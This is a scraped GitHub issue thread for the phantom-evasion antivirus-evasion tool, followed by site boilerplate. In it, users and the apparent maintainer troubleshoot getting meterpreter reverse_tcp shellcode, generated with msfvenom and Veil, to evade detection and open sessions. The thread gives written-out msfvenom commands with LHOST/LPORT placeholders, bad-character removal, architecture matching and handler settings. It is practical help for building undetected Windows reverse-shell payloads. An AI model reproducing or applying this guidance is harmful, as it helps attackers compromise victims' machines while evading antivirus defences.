Comments (35)
Of course
from phantom-evasion.
@oddcod3 Works! the wrong badchars were the problem. Thanks for the help!
from phantom-evasion.
64 bit payloads are more efficient (1/66) as mentioned in the README.
For example use windows/x64/meterpreter/reverse_tcp as msfvenom payload with one of the Windows shellcode injection modules.
from phantom-evasion.
Only problem is that I couldn't get shellcode injection to work even on 32bit.
I generated win shellcode with
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f c > outfile
which gave me a file like
#some notes
"\xfc\x8d\....\k6s"
"\j2c\x20\...\x00";
and I merged all together and pasted all in one line like \xfc\x8d\k6s\j2c\x20\x00
Was that correct or is there my mistake?
from phantom-evasion.
Your shellcode contains badchars (like \x00 (string terminator in c),\x0a and \x0d).
To avoid the problem add to your msfvenom command: -b "/x00/x0a/x0b"
Or use directly the option msfvenom payload in phantom evasion which automatically remove badchars from shellcode.
from phantom-evasion.
As described in this issue, I can't use the option msfvenom payload in phantom evasion, because you can't add other options besides lhost/lport
like PrependMigrate
but I will try the shellcode method again
from phantom-evasion.
I have no luck.
No shellcode worked, the default meterpreter only worked partly.
The default meterpreter sends the initializer stage, but exits afterwards
from phantom-evasion.
Did you set payload option in multi/handler correctly?
If you use 64 bit payload the listener must be aware of what kind of stages will have to send once a connection has been established(x86 or x64 meterpreter stages).
from phantom-evasion.
It looks like you've used windows/x64/meterpreter/reverse_tcp as payload but on multi/handler you've set payload windows/meterpreter/reverse_tcp.
from phantom-evasion.
No I've used the 32bit payload on both listener and sender.
The only time I ran in this same error was when I was testing the reverse_http payload with proxy, but besides that it ether worked or didn't work at all
But I think with a lot of testing I can figure this one out myself
My main problem is a different one. It's how to use Metersploit as Shellcode. When created and implemented like in my comments above, even with AV turned off, it just doesn't create the connection
Has anyone even tested it with own shellcode from msfvenom?
from phantom-evasion.
Could you paste here your msfvenom command used to generate the shellcode?
(Without lhost and lport information)
from phantom-evasion.
Already posted it above but here again:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0b" > outfile
from phantom-evasion.
@anonymouz4 same problem
from phantom-evasion.
Any updates on this?
from phantom-evasion.
@oddcod3 I used custom shellcode generated by veil and couldn't get any session back to meterpreter.Could you please check it?
from phantom-evasion.
@anonymouz4 i've made a mistake: not /x0b but /x0d
from phantom-evasion.
@oddcod3 I didn't use badchars while generating shellcode with veil.The badchars that I avoided were \x00\x0a\x0d
from phantom-evasion.
@oddcod3 Ok I will try this with /x0d and then get back to you
from phantom-evasion.
I'm testing now if i can reproduce the issue.
At the moment i've tested custom msfvenom x86 shellcode with compiling option x86 and i can establish a session without problem.
Are you all (@usama7628674 @anonymouz4 @onesentinel) aware that using an x86 shellcode require to compile the executable for x86 architecture?
from phantom-evasion.
@oddcod3 Here's how can you reproduce the issue
clone and install veil from github
use ordnance
select payload rev_tcp
set badchars \x00\x0a\x0d
set other options lhost,lport
generate
Then copy and paste the shellcode in phantom-evasion
select architecture x64.
run the generated .exe in windows 10 v1803
from phantom-evasion.
@usama7628674 Are you sure payload rev_tcp
isn't 32bit?
from phantom-evasion.
@anonymouz4 Thats what I don't know.I'll ask from veil developer
from phantom-evasion.
@usama7628674 I'm almost sure that that is the case here. Just use msfvenom to create the shell code
from phantom-evasion.
@anonymouz4 Maybe veil is generating 32 bit shellcode while I'm using x64 arch in phantom-evasion will try x86 arch and see if it works or not
from phantom-evasion.
Yes ,as @anonymouz4 said veil payloads are 32 bit, @usama7628674 with x86 compiling option you'll see a session correctly established!
from phantom-evasion.
@anonymouz4 finally!! (I'm sorry for the typo!)
from phantom-evasion.
@oddcod3 Yeah I'm pretty sure now veil generates 32 bit shellcode
from phantom-evasion.
@oddcod3
I think I celebrated a little too early. It creates the connection but instantly dies
And this time I'm 100% sure everything is on 32bit
from phantom-evasion.
@anonymouz4 try with veil and see it you sustain connection permanently
from phantom-evasion.
@usama7628674 Maybe, but I'll need to invest a lot of time bc Veil isn't working yet for me. Everytime I run the script it just says installing and finishes that with success. So I probably have to do all manually
from phantom-evasion.
@anonymouz4 You must install it using git clone method
from phantom-evasion.
@usama7628674 I did
from phantom-evasion.
@anonymouz4 What did you get after executing?
from phantom-evasion.
Has anyone achieved a working connection with 64bit
shellcode?
My summary:
Veil:
Only supports 32bit shellcode (not testet, but prob. works)
msfvenom:
32bit connects but instantly dies. 64bit doesn't work at all
from phantom-evasion.
I will open a new issue, close this one to create an overview on this topic, bc everything here is a little unclear
Just like a fresh Start
from phantom-evasion.
Related Issues (20)
- smali???????????????? HOT 2
- Request for help (and maybe documentation?) HOT 1
- Didnt work on Android Payload Execution HOT 2
- AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12Type' HOT 9
- Latest Version 2020 Phantom Evasion
- i have a probleme with keeping process alive HOT 2
- Compilation Error HOT 3
- No such file or directory HOT 1
- os.rename(Filename,Tmpfile) FileNotFoundError: [Errno 2] No such file or directory
- Problem with obfuscating smali code HOT 2
- error while compiling HOT 3
- Why Is Phantom Evation installing MinGw in Linux??? HOT 1
- Setup error Kali Linux 2020.4 HOT 1
- Phantom Evasion not storing the file
- Ant
- Windows Poweshell/PyInstaller payloads not found- All other payloads getting detected by Windows 10 defender HOT 1
- how do you make it undetctable HOT 2
- ERROR:'osslsigncode'
- Don't download this shit
- Setup fails on kali-linux wsl
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from phantom-evasion.